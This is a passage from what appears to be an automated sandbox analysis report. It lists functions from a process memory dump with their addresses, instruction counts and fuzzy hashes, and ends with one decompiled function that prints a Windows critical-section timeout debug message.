                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0109D380, Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                          • Instruction ID: 2c975c4e774fc1c066c1e10e60f3aa6e45f462522f393b71fd87dc072145fc8d
                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                          • Instruction Fuzzy Hash: 58E0C231280244FBEF225E84CC10FB97B56EB507A1F108031FE885A691C679AD91E7C4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0101A185, Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 05ee77f1d7c1d1e1bbe5a72190a35d4279585ab0430b9cf275c9b5756d9933be
                          • Instruction ID: f52bb6777c0b05c998493fd49a79d86499281b05b16cbee34587e6a72d3c2621
                          • Opcode Fuzzy Hash: 05ee77f1d7c1d1e1bbe5a72190a35d4279585ab0430b9cf275c9b5756d9933be
                          • Instruction Fuzzy Hash: 00D02E713231809AD72E6300C824BE23222F7807A0F34084CF2C70B9EAEA6A88D48208
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010116E0, Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8d2cf1478fa19338410d576e789cf1f650abe18d5193b7622d0655869b6acfb2
                          • Instruction ID: d2b6cb89635b822ce54cdc9b57bcff546efd2197e3399a6e2740390740dc7722
                          • Opcode Fuzzy Hash: 8d2cf1478fa19338410d576e789cf1f650abe18d5193b7622d0655869b6acfb2
                          • Instruction Fuzzy Hash: 29D0A731200202A2EA2E5B24AC14B142691FB94781F38049CF347494C1DFBACC93E04C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010653CA, Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                          • Instruction ID: 54f4a268f7b06ffecd70a0f352bf28e235b80857551660602096ffcc3f03bb18
                          • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                          • Instruction Fuzzy Hash: A0E0EC719446849BDF12DB59CA50F5EBBF9FB84B80F154454A5885F671C668AD00CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FFAAB0, Relevance: .0, Instructions: 12COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                          • Instruction ID: 104ba51aec92819027652f42a388b6d7fe0d2781b364adb1bc016b672f9eb4e1
                          • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                          • Instruction Fuzzy Hash: 82D0E975352980CFD657CB1DC594B1573A4BF44B44FC504E0E945CB762E62CDD44CA10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010135A1, Relevance: .0, Instructions: 12COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                          • Instruction ID: d075dba85ec1bbb88db7e62d23767e341103b701db8fcd05836f59114e30a6d7
                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                          • Instruction Fuzzy Hash: 24D0A9314011849EEB82AB14C2187ACBBB3BF00A28F5820A5D2820E86EC33E4A1AD600
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FEDB40, Relevance: .0, Instructions: 11COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                          • Instruction ID: 410e2f3803098ab7d73e62c28712c78d5bf5ca9450410403cc2e139f97dca13b
                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                          • Instruction Fuzzy Hash: D2C08C30290A41AAEB221F20CE01B4036A1BB50B01F4500A06300DA4F0EBB8DC01E600
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0106A537, Relevance: .0, Instructions: 11COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                          • Instruction ID: fd4fcb868c7a4a8fbe4c48abf885243a28a3a6bd4f43e7b91f5e0fac999d53b0
                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                          • Instruction Fuzzy Hash: FFC01232080688BBCB126E81CC00F467B2AFBA4B60F008011BA480A5A0C632E9B0EA84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01003A1C, Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                          • Instruction ID: b0ba6b8d60a45c0da10fedb81b035ddddf7f94e8f0236a0b7259fabf3b7116af
                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                          • Instruction Fuzzy Hash: A8C08C32080648BBC7126E41DD00F017B29E7A4B60F000020B7040A5A0C572EC60D58C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FEAD30, Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                          • Instruction ID: 99e87521ff6328d94fffe156e0663d8aa177b68c779b5967b3666208af0518d2
                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                          • Instruction Fuzzy Hash: 5DC08C32080248BBC7126A45CD00F017B29E7A0BA0F000020F6480A6A2C936E860D588
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FF76E2, Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                          • Instruction ID: b0e063dc66b58c219ae2558735fc5b580bf6d3e25caa4bc21e287a0e000a9a10
                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                          • Instruction Fuzzy Hash: 4AC08C70545ACC5AEB2A6708CE20B707650BF18718F4801BCAB85894F2D36CBC02D248
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010136CC, Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                          • Instruction ID: ab2a33321f78f00134e4d29cd7feafe07ef84771863e7d236c0a7935e39da586
                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                          • Instruction Fuzzy Hash: 66C02B74150840FBE7165F30CE00F147294F704A31F6407A47320894F0E56C9C00D104
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01007D50, Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                          • Instruction ID: 3dcc8d537ab351f164720f7ae8eca209885483aef1e84d13dfe21feb9185f5d0
                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                          • Instruction Fuzzy Hash: BBB092353019408FDE57EF18C080B1533F4BB44A40F8400D0E440CBA21D229E9008900
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01012ACB, Relevance: .0, Instructions: 5COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                          • Instruction ID: 07779fabfb211d0a1cde484bb93d5badeaeed673af4d4a9e0bd05062bf9814c3
                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                          • Instruction Fuzzy Hash: 2FB01232C10444CFCF02EF40CA10B297332FF40750F054490A20167931C22CAC11DB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029950, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: faf6143a9dfebfbfcadba53fce2dd97480f4bd434d01e77e5f0c9c8aeef8bbcb
                          • Instruction ID: 445434661316b5bac21f645809d51336830627cc6d982003a9ecb48d0a02f0c1
                          • Opcode Fuzzy Hash: faf6143a9dfebfbfcadba53fce2dd97480f4bd434d01e77e5f0c9c8aeef8bbcb
                          • Instruction Fuzzy Hash: 879002A122140903D140659988046070109A7D0343F91C011A2454555ECA698C617275
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010299D0, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 93483d6a2618de7190ac9f488ee1bc92d3bf396ab5e9d0262d9b0b95b68f924a
                          • Instruction ID: 19d8912fbd956ea94acd83a66d8cf87fa946021ffdbfb035dfc4fc78c2fccdc6
                          • Opcode Fuzzy Hash: 93483d6a2618de7190ac9f488ee1bc92d3bf396ab5e9d0262d9b0b95b68f924a
                          • Instruction Fuzzy Hash: F09002A123100542D104619984047060149A7E1242F91C012A2544554CC5698C716265
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029820, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3c0cd099be4b50891aa274334f9dbd51d5f3e7eb64bc30476b43aaa23f4185a8
                          • Instruction ID: 13fff0bdcb069fef8d6b8a9808eb4ebe5d7da6ebb4d7974f9dcc40646a528cac
                          • Opcode Fuzzy Hash: 3c0cd099be4b50891aa274334f9dbd51d5f3e7eb64bc30476b43aaa23f4185a8
                          • Instruction Fuzzy Hash: 2D90027126100902D14171998404606010DB7D0282FD1C012A0814554EC6958A66BBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0102B040, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 499850189380c48b48b4810f1e0e8098d458b79e97eadc339855c3071291a351
                          • Instruction ID: 2d6333bf46b0a442f38ef25943159c5b283a4a08f99eb7ac62a27797e6360de1
                          • Opcode Fuzzy Hash: 499850189380c48b48b4810f1e0e8098d458b79e97eadc339855c3071291a351
                          • Instruction Fuzzy Hash: 269002A1621145434540B19988044065119B7E13423D1C121A0844560CC6A88865A3A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010298A0, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b970432eb44a64b7468df79c63a92d6111cc9c3c427807e8a015b1e009e4e836
                          • Instruction ID: 36f380b874187825325f68b0b508708f7cdc7ecb5227265dc4c709009d7ec030
                          • Opcode Fuzzy Hash: b970432eb44a64b7468df79c63a92d6111cc9c3c427807e8a015b1e009e4e836
                          • Instruction Fuzzy Hash: B690026132100902D10261998414606010DE7D1386FD1C012E1814555DC6658963B272
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029B00, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3ef437f1eb8ad3f53df82fd98be10d11836c0f1736e04462f52036f6f8f21733
                          • Instruction ID: de066ca831bea974e4b502f2359dd80ac8dbbf3fe7abe29be273ce9a2cb9ed43
                          • Opcode Fuzzy Hash: 3ef437f1eb8ad3f53df82fd98be10d11836c0f1736e04462f52036f6f8f21733
                          • Instruction Fuzzy Hash: 8990026126100D02D1407199C414707010AE7D0642F91C011A0414554DC656897577F1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0102A3B0, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eb185b7fb2268bf07e6e9916a2bbc9de7139b91f14f2e89a75a3b0942f3de86d
                          • Instruction ID: fc0602712ab44ef66cd6a9bb21d708f89c8d0e17c241f9f71251da78f653e115
                          • Opcode Fuzzy Hash: eb185b7fb2268bf07e6e9916a2bbc9de7139b91f14f2e89a75a3b0942f3de86d
                          • Instruction Fuzzy Hash: 2190027122144502D1407199C44460B5109B7E0342F91C411E0815554CC6558866A361
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029A10, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db81c2131cc5d7569e2b941a66345877d83c0c683f156def2b021febb341f220
                          • Instruction ID: 04e414bc2a472f68e78c80f94a84dbc839c1701b1bff6549e20b968d9b4f9133
                          • Opcode Fuzzy Hash: db81c2131cc5d7569e2b941a66345877d83c0c683f156def2b021febb341f220
                          • Instruction Fuzzy Hash: 1790027122140902D100619988087470109A7D0343F91C011A5554555EC6A5C8A17671
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029A80, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 817c2850f7ad0a9b403114d6d3a424fdc174293cdfcac5601bf01c557c455cd4
                          • Instruction ID: 44afaef8620daec406fb5eab3b984d2dce80aa709e56c4c1ded2a508197b5748
                          • Opcode Fuzzy Hash: 817c2850f7ad0a9b403114d6d3a424fdc174293cdfcac5601bf01c557c455cd4
                          • Instruction Fuzzy Hash: 1890026122144942D14062998804B0F4209A7E1243FD1C019A4546554CC95588656761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029520, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25c0706e37584b7939bdd80090be445a286f52a6fd7aebdc3b9e763a35f5feda
                          • Instruction ID: bbef87c4316f879fd00348d76f9d1b8f1a5c36a0c2f6e63e3ffbc24ec158a5b7
                          • Opcode Fuzzy Hash: 25c0706e37584b7939bdd80090be445a286f52a6fd7aebdc3b9e763a35f5feda
                          • Instruction Fuzzy Hash: 9D9002E1221145924500A299C404B0A4609A7E0242B91C016E1444560CC5658861A275
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0102AD30, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 47c1f9eff866176a8ead9f3e3b7e16ab9a7e8897e7339bb434f2425092edd2e6
                          • Instruction ID: a201254f0c99b29d1d72efd8b068178cead1a28dd3ae6cdeb2617b805cd69fd6
                          • Opcode Fuzzy Hash: 47c1f9eff866176a8ead9f3e3b7e16ab9a7e8897e7339bb434f2425092edd2e6
                          • Instruction Fuzzy Hash: 9A900271A2500512914071998814646410AB7E0782B95C011A0904554CC9948A6563E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029560, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2c8a0e96e3ae77f5bc1475f4f368976bc5a59b2fffee53213d295685cacc53dc
                          • Instruction ID: 01d690c2491289a16cefb2a75e89d65be9a500935ea5702fd1304b5c9513eb24
                          • Opcode Fuzzy Hash: 2c8a0e96e3ae77f5bc1475f4f368976bc5a59b2fffee53213d295685cacc53dc
                          • Instruction Fuzzy Hash: 21900265231005020145A599460450B0549B7D63923D1C015F1806590CC66188756361
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010295F0, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e469d562635e586c61fb23504879a98993cf1ab758cae2ac2605af7dc462061
                          • Instruction ID: 65cbdb5b8abe911aaee432da30c98f13b03c306f08de652ad463e98c2e99572e
                          • Opcode Fuzzy Hash: 1e469d562635e586c61fb23504879a98993cf1ab758cae2ac2605af7dc462061
                          • Instruction Fuzzy Hash: 1590027122100D02D104619988046860109A7D0342F91C011A6414655ED6A588A17271
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0102A710, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d15f1c3313029a03c0707caff2e9cc7c635c57b4de0ce1b36d129f664ba391b
                          • Instruction ID: 3abd754c73ed82c0ecb0a3807f013ec05deaa5214c74db521d77937526971426
                          • Opcode Fuzzy Hash: 6d15f1c3313029a03c0707caff2e9cc7c635c57b4de0ce1b36d129f664ba391b
                          • Instruction Fuzzy Hash: CD900271321005529500A6D99804A4A4209A7F0342B91D015A4404554CC59488716261
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029730, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3ab11fa6ecf890e9d3f2b65de6d234d6d84f6a5c16e45d5b046a3c8186bbc1e7
                          • Instruction ID: a0b96b9eef6f6a6f02e59979be703768a67cd350026d8c698c080111fd05b497
                          • Opcode Fuzzy Hash: 3ab11fa6ecf890e9d3f2b65de6d234d6d84f6a5c16e45d5b046a3c8186bbc1e7
                          • Instruction Fuzzy Hash: 6B90026162500902D140719994187060119A7D0242F91D011A0414554DC6998A6577E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029760, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: df40270e8e610e83362620f43771031d1facf7d1f6b4f96d73759cd44bff3c2e
                          • Instruction ID: 343e2be6aa9f8bcd5cff015e85cfeb2408ff8f7409ce7c333c9f532a4dc8afd1
                          • Opcode Fuzzy Hash: df40270e8e610e83362620f43771031d1facf7d1f6b4f96d73759cd44bff3c2e
                          • Instruction Fuzzy Hash: B690027122100903D100619995087070109A7D0242F91D411A0814558DD69688617261
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0102A770, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3a2663dffcf8762e23be70eb0d8b6fd4d96f6c94c4f8303e84da7d7c18f99a6f
                          • Instruction ID: 9ac1a8b09035e0cc81290d581e2d974261327ce542baca8d2ff2612d245b3e60
                          • Opcode Fuzzy Hash: 3a2663dffcf8762e23be70eb0d8b6fd4d96f6c94c4f8303e84da7d7c18f99a6f
                          • Instruction Fuzzy Hash: 9590027522504942D50065999804A870109A7D0346F91D411A081459CDC6948871B261
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029770, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 90846ec646525319f91e9e93f4b8bd1d642747ff14320bd62b79f2e3bb41a86a
                          • Instruction ID: aac337c5de8b4efa4cf54b4d915773d55e78858876539a1ed8edeee03bffa42f
                          • Opcode Fuzzy Hash: 90846ec646525319f91e9e93f4b8bd1d642747ff14320bd62b79f2e3bb41a86a
                          • Instruction Fuzzy Hash: 8390026122504942D10065999408A060109A7D0246F91D011A1454595DC6758861B271
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029610, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3bd53f3d76982ce81c50cdbdd97b48a5548e1c6f8c36993a5cfbb5a88164216b
                          • Instruction ID: 7dedbcbf9af5667bd211eb4a070f9042a282fb26ef9c61fce3fcff3b030be0ab
                          • Opcode Fuzzy Hash: 3bd53f3d76982ce81c50cdbdd97b48a5548e1c6f8c36993a5cfbb5a88164216b
                          • Instruction Fuzzy Hash: 0F90027162500D02D150719984147460109A7D0342F91C011A0414654DC7958A6577E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029650, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d56040d9bf4e343644818a4a20a613db49afd91fe8499f161e7e0f598d5ae0e3
                          • Instruction ID: 32352129f9461d6858092b3a50f57e83c265fad49a09f1a75545861e4da16c90
                          • Opcode Fuzzy Hash: d56040d9bf4e343644818a4a20a613db49afd91fe8499f161e7e0f598d5ae0e3
                          • Instruction Fuzzy Hash: E890027122504D42D14071998404A460119A7D0346F91C011A0454694DD6658D65B7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010296D0, Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a69f79b7b792bd2479ee4560fbafb4ea4b70b1c8a93bd60d6335fe16fee2df0
                          • Instruction ID: 79815e2fc6dc23ff0ff904b6267ec1a968effc08295fb863cc57ffdcbe546b37
                          • Opcode Fuzzy Hash: 5a69f79b7b792bd2479ee4560fbafb4ea4b70b1c8a93bd60d6335fe16fee2df0
                          • Instruction Fuzzy Hash: FB90027122100D42D10061998404B460109A7E0342F91C016A0514654DC655C8617661
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029670, Relevance: .0, Instructions: 2COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction ID: 63320afde319bd72aea9ba72a9a890aaf3ce4b5175db8d93795c45f68dcd5e5b
                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction Fuzzy Hash:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0107FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                          Download Yara Rule
                          C-Code - Quality: 53%
                          			E0107FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0102CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01075720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01075720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                          0x0107fdda
                          0x0107fde2
                          0x0107fde5
                          0x0107fdec
                          0x0107fdfa
                          0x0107fdff
                          0x0107fe0a
                          0x0107fe0f
                          0x0107fe17
                          0x0107fe1e
